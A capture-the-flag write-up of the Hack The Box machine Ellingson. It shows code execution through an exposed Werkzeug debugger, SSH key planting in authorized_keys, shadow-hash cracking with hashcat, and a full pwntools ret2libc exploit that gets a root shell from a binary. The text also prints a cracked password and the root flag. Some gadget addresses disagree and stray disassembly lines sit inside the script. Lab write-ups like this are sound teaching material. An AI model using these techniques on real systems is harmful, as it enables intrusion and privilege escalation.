hello fellow hackers today im going to solve Ellingson from hack the box
so lets get started !!!!
i started with nmap to discover open ports on the machine :
nmap -A -v -sT 10.10.10.139
so the box has tow port open :
1- ssh running on port 22
2- nginx web server running on port 80
seems interesting??? not yet mate ,, lets check out port 80
it looks like it is a web site for Ellingson mining company
after some goofing around inside the web page i found many interesting things :
this page is telling us that there is some kind of protection on the web site
this page indicates that the site is already been hacked !!
and this weird page is telling us about the most used passwords !!!
but since articles in /articles/ is increasing by the number and there is only 3 articles i tried to access article 4, and i got an error …
after checking out the page i found that its running Werkzeug Debugger, which is a python debugger
after some google search i found out that you can run python inside that debugger , so lets try it out
import os
os.popen("ls").read();
and it worked !!! we can run commands on the machine as hal user
after some enumeration i tried to get reverse shell from the machine but it didn’t work probably because the protection that been added to the site , so i started to search for another way to get in
so after some time i fond .ssh directory and i found authorized_keys file that i can write my ssh public key in
os.popen("echo 'your public key' >> /home/hal/.ssh/authorized_keys").read()after writing my public key in the file , lets now login to ssh
ssh [email protected]
and we are in as hal ,but we can’t read the user flag , so we need to escalate our privilege
after some enumeration i found that hal user is part of adm group so we need to find any useful files that we can use as part of adm
find / -group adm 2>/dev/null
after running the command i found a backup file for shadow file that usually owned by root
so lets crack!!!
hashcat -a 0 -m 1800 shadow.bak rockyou.txt --force
it took some time to run but it cracked it
user :margo password:iamgod$08
and we are in !!!!
now for the root part
after some enumeration i found a binary that is not usually found in debian
after running the binary it asked for a password after tying some defaults i didn’t work so i tried to cues a buffer overflow so i enterd 200 “A” characters
and we have a segmentation fault
so lets run it on gdb to see were it crashed
so the program crashed after running 200 characters pattern ,lets see where i t started to overwrite
Using pattern offset we know that it is 136 characters
now lets get some address to write our exploit
objdump -D garbage |grep main
gives address as:0x401619
objdump -D garbage |grep puts
gives: plt_puts:0x401050 and got_puts:0x404028
ropper -f garbage | grep rdi
pop_rdi = 0x40122
ldd garbage | grep libc
readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep puts
0x71910
readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep system
strings -a -t x /lib/x86_64-linux-gnu/libc.so.6 | grep /bin/sh
now to our exploit : …..
#REMOTE SCRIPT:
from pwn import *
context(terminal=['tmux','new-window'])
shell = ssh('margo', '10.10.10.139', password='iamgod$08', port=22)
p= shell.process('/usr/bin/garbage')
#p=gdb.debug('./garbage','b main')
context(os="linux",arch="amd64")
#context.log_level = 'DEBUG'
# 401050: ff 25 d2 2f 00 00
<puts@GLIBC_2.2.5>
#stage 1
#objdump -D garbage |grep main
plt_main = p64(0x401619)
#objdump -D garbage |grep puts
# 401050: ff 25 d2 2f 00 00
<puts@GLIBC_2.2.5>
plt_put = p64(0x401050)
got_put = p64(0x404028)
#ropper -f garbage | grep rdi
pop_rdi = p64(0x40179b)
junk = "A"*136
jmpq *0x2fd2(%rip) # 404028
jmpq *0x2fd2(%rip) # 404028
#Enter access password: sdfdsf
#
#access denied.
payload = junk + pop_rdi + got_put + plt_put + plt_main
p.sendline(payload)
p.recvuntil('denied.')
leaked_puts = p.recv()[:8].strip().ljust(8,"\x00")
log.success("Leaked puts@GLIBCL: " + str(leaked_puts))
leaked_puts = u64(leaked_puts)
#log.success("Leaked puts@GLIBCL(unpacked): " + str(leaked_puts))#stage 2
pop_rdi = p64(0x40179b)
#0x0000000000401799: pop rsi; pop r15; ret;
pop_rsi = p64(0x401799)
#readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep puts
#libc_put = 0x71910
libc_put = 0x809c0
#readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep system
#libc_sys = 0x449c0
#libc_sys = 0x4f440
#readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep execvp
libc_execvp = 0xe5490
# strings -a -t x /lib/x86_64-linux-gnu/libc.so.6 | grep /bin/sh
#libc_sh = 0x181519
libc_sh = 0x1b3e9a
libc_setuid = 0xe5970
offset = leaked_puts - libc_put
execvp = p64(offset + libc_execvp)
setuid = p64(offset + libc_setuid)
sh = p64(offset + libc_sh)
null = p64(0x00)
payload = junk + pop_rdi + null + setuid + pop_rdi + sh + pop_rsi + null + null +
execvp
p.sendline(payload)
p.recvuntil('denied.')
#raw_input()
p.interactive()
and we are root!!!
and the root flag is :1cc73a448021ea81aee6c029a3d2f997
SMT Red Team